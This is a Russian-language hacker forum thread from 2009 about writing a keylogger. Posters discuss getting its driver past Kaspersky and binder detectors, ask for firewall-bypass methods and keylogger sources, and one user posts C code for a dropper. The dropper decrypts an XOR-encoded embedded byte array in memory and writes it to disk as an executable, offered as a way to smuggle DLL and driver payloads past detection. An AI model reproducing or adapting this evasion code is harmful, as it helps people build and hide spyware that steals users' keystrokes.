Неплохой кейлогер

karabas-barabas · 27.02.2009

to Rexel:
если нужно, могу поделиться технологией как лучше переносить в экзешнике всякие вкусности типа dll, sys без ресурсов и др. binder detector отдыхает... :holloween:
а как именно ругается каспер, скрин можешь в студию ?

DeusTirael · 27.02.2009

А в ресурсах уже не модно ?

ReXeL · 27.02.2009

Хм...думаем, думаем))
karabas-barabas поделись)
Да каспер ругаеться ТОЛЬКО на сам драйвер, я у друга тестом занимаюсь...
Но каспер кричит))

DeusTirael · 28.02.2009

karabas-barabas, эта технология заключается в хранении вкусностей в оверлее ?

el- · 28.02.2009

почему сразу ресурсы или еще какой нить изврат чем не подходит простой чар массив ?

Код:

static char driver[] = "\x00\x00\x ...";

ReXeL · 28.02.2009

Так парни, интересует обход фаерволла самыми изащрёнными способами(это будет функцией в кейлогере=)).... кто чем поможет?)

Одинокий Волк · 28.02.2009

Так парни, интересует обход фаерволла самыми изащрёнными способами(это будет функцией в кейлогере=)).... кто чем поможет?)

Ну если самым самым, то для каждого uninstall -> next -> next :-DDD

ReXeL · 03.03.2009

Ну это уже какой-то авто-кликер))))
Сейчас друзья дописывают игрушку, и мы продолжим с ними написание нашего маленького друга....
Может у кого есть исходники кейлогеров (пусть самопальных), интересно посмотреть, скиньте тогда в личку

DeusTirael · 04.03.2009

http://www.rohitab.com/discuss/
Source Codes

karabas-barabas · 05.03.2009

если нужно, могу поделиться технологией как лучше переносить в экзешнике всякие вкусности типа dll, sys без ресурсов и др. binder detector отдыхает...

собсно так как el- сказал , тока надо это дело автоматизировать немного

прога которую я написал генерит байткод и ксорит по ключу который юзер задает, его удобно просто взять скопировать и вставить в переменную char a[] = ...
ссыль на прогу

public bytecode generator

в коде применяется так

Код:

BOOL  CrypDecryp(char* inn,int key, int size_inn);
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE, PSTR, INT iCmdShow) 
{
char train[] = "\x5e\x12\x12\x12\x13\x06\x10\x12\x12\x12\x12\x12\xd2\x12\x12\x12\x12\x12\x12\x54\x91\x12\x12\x12\x32"
"\x12\x12\x12\xd6\x80\x78\x75\xfc\x87\xdb\x13\xce\x26\xa6\x60\xfc\x87\xdb\x13\x12\xe2\x3a\x84\x28\x81\xd5"
"\x13\x12\x40\x10\x12\x12\x12\x12\x12\x13\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x09"
"\x13\x06\x12\x0d\x42\xf2\x5d\xc2\x32\xf8\x28\x7b\x02\xb0\xca\x1a\x12\x39\x22\x22\x8f\x0b\x12\x3d\x57\x28"
"\x4e\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12\x58\x12\x23\x12\x12\x12"
"\x12\x12\x45\x28\xf5\x8e\x02\x12\x42\x40\x5d\x55\x40\x53\x6c\x23\x12\x12\x20\x12\x11\x12\x16\x12\xfd\xac"
"\x60\x25\x5d\x69\x45\x28\xf6\x8c\x06\x12\x12\x12\x62\x12\x60\x12\x7d\x12\x75\x12\x60\x12\x73\x12\x7f\x12"
"\x32\x12\x74\x12\x7b\x12\x7e\x12\x77\x12\x61\x12\x12\x12\x0a\x12\x48\x12\x23\x12\x12\x12\x12\x12\x45\x28"
"\xf9\x8c\x02\x12\x51\x5d\x47\x5c\x46\x57\x6c\x21\x12\x12\x50\x12\x11\x12\x16\x12\xfd\xac\x45\x28\xf5\x8e"
"\x45\x28\xf9\x8c\x06\x12\x12\x12\x51\x12\x7d\x12\x67\x12\x7c\x12\x66\x12\x77\x12\x60\x12\x3f\x12\x41\x12"
"\x66\x12\x60\x12\x7b\x12\x79\x12\x77\x12\x32\x12\x41\x12\x7d\x12\x67\x12\x60\x12\x71\x12\x77\x12\x12\x12"
"\x0a\x12\x5a\x12\x20\x12\x12\x40\x10\x12\xb8\x24\xb0\x8e\x32\x12\x40\x47\x5c\x4d\x51\x41\x41\x3c\x77\x6a"
"\x77\x12\x3c\x12\x11\x12\x16\x12\xfd\xac\x45\x28\xf5\x8e\x45\x28\xe2\x8e\x06\x12\x12\x12\x40\x12\x47\x12"
"\x5c\x12\x4d\x12\x51\x12\x41\x12\x41\x12\x3c\x12\x77\x12\x6a\x12\x77\x12\x12\x12\x08\x12\x12\x12\x73\x12"
"\x12\x12\x0e\x12\x12\x12\x13\x12\x12\x12\x0e\x12\x12\x12\x3f\x12\x12\x12\x12\x12\x12\x12\x72\x12\x12\x12"
"\x03\x12\x12\x12\x11\x12\x12\x12\x04\xc1\xa9\x9a\x02\x12\x12\x12\x12\x57\x28\x4e\x62\x60\x7d\x75\x60\x73"
"\x7f\x32\x74\x7b\x7e\x77\x61\x4e\x51\x7d\x67\x7c\x66\x77\x60\x3f\x41\x66\x60\x7b\x79\x77\x32\x41\x7d\x67"
"\x60\x71\x77\x4e\x40\x47\x5c\x4d\x51\x41\x41\x3c\x77\x6a\x77\x12\x12\x72\x12\x12\x12\x11\x12\x12\xb2\x4a"
"\x12\x12\x12\x12\x12\x12\x12\x7f\x7b\x71\x60\x7d\x61\x7d\x74\x3f\x2a\x27\x24\x77\x73\x21\x12\x6c\x59\x3e"
"\xbe\xfa\xf0\x8d\x57\x84\x71\x25\x63\x7c\x80\x6e\x74\xaf\xab\x25\x9c\xc1\x13\xcc\x03\xbf\xc9\x12\x09\xee"
"\x8d\xbb\x35\x6c\x59\x3e\xbe\xfa\xf0\x8d\x57\x84\x71\x25\x63\x7c\x80\x6e\x74\xaf\xab\x25\x9c\xc1\x13\xcc"
"\x03\xbf\xc9\x12\x09\xee\x8d\xbb\x35\x12\x12\x12\x12";

CrypDecryp(train,18,sizeof(train));  train[sizeof(train)-1]='\0'; // дешифровуем в памяти
HANDLE hand = CreateFile("C:\\train.exe",GENERIC_WRITE|GENERIC_READ,1|2,NULL,CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);// создаем пустой файл
unsigned long written = 0; // кол-во записанных байт, символически почти
WriteFile(hand, train,sizeof(train)-1, &written, 0); //пишем в нащ файл дешифрованную информацию из буфера
	CloseHandle(hand);
return 0;
}

BOOL  CrypDecryp(char* inn,int key, int size_inn) 
{int i = size_inn;

for (int j =0;j<i;j++)
{
	{ inn[j] = (char)( ((int)inn[j])^(key) );}
	
}
return true;
}

ReXeL · 06.03.2009

Красиво!)

ReXeL · 18.01.2011

Ребят у меня все полетело((
У кого-нибуть исходники этого чуда остались?

accelerator · 21.01.2011

Ребят у меня все полетело((
У кого-нибуть исходники этого чуда остались?

Сорцы ж вроде приаттачены в первом посте или какого чуда? =)

Неплохой кейлогер

karabas-barabas

(L1) cache

DeusTirael

(L1) cache

ReXeL

RAM

DeusTirael

(L1) cache

el-

Старожил форума

ReXeL

RAM

Одинокий Волк

CPU register

ReXeL

RAM

DeusTirael

(L1) cache

karabas-barabas

(L1) cache

ReXeL

RAM

ReXeL

RAM

accelerator

RAM